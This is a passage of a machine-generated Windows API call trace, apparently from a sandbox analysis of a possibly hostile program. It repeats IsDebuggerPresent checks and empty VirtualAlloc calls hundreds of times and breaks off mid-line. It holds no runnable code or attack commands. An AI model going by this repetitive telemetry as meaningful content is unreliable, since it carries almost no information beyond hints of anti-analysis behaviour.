(lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0048.026] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0048.027] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.027] IsDebuggerPresent () returned 0 [0048.028] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] IsDebuggerPresent () returned 0 [0048.028] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.028] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.029] IsDebuggerPresent () returned 0 [0048.029] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.030] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.031] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.032] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.033] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.034] IsDebuggerPresent () returned 0 [0048.035] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] IsDebuggerPresent () returned 0 [0048.035] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.035] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.036] IsDebuggerPresent () returned 0 [0048.036] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.037] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] IsDebuggerPresent () returned 0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.038] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.039] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.040] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.041] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.042] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.043] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.044] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, 